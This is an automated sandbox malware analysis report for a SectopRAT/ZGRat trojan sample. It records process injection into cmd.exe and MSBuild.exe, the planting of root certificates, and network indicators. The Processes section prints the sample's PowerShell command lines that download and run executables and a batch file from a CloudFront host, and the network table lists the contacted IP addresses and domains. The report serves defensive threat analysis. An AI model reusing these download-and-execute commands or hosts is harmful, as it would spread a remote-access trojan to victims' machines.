Malware Analysis Report

2025-01-02 05:48

Sample ID 240426-skvyvafa7s
Target file
SHA256 7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9
Tags
sectoprat zgrat rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

sectoprat zgrat rat trojan

SectopRAT payload

ZGRat

Detect ZGRat V1

SectopRAT

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Modifies system certificate store

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-26 15:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-26 15:11

Reported

2024-04-26 15:14

Platform

win7-20240221-en

Max time kernel

144s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2044 set thread context of 2500 N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 set thread context of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\uf4.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\uf4.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\uf4.3.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2952 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2952 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2952 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2952 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2624 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2624 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2624 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2624 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 544 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.0.exe
PID 544 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.0.exe
PID 544 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.0.exe
PID 544 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.0.exe
PID 544 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe
PID 544 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe
PID 544 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe
PID 544 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe
PID 544 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe
PID 544 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe
PID 544 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe
PID 2044 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2044 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2044 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2044 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 544 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.3.exe
PID 544 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.3.exe
PID 544 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.3.exe
PID 544 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\uf4.3.exe
PID 2044 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2436 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\uf4.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2436 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\uf4.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2436 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\uf4.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2436 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\uf4.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2500 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2500 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2500 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2500 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2500 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2500 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsy17E5.tmp\lood.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\uf4.0.exe

"C:\Users\Admin\AppData\Local\Temp\uf4.0.exe"

C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\uf4.3.exe

"C:\Users\Admin\AppData\Local\Temp\uf4.3.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
NL 108.156.61.13:443 d68kcn56pzfb4.cloudfront.net tcp
NL 108.156.61.13:443 d68kcn56pzfb4.cloudfront.net tcp
NL 108.156.61.13:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
NL 108.156.61.13:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
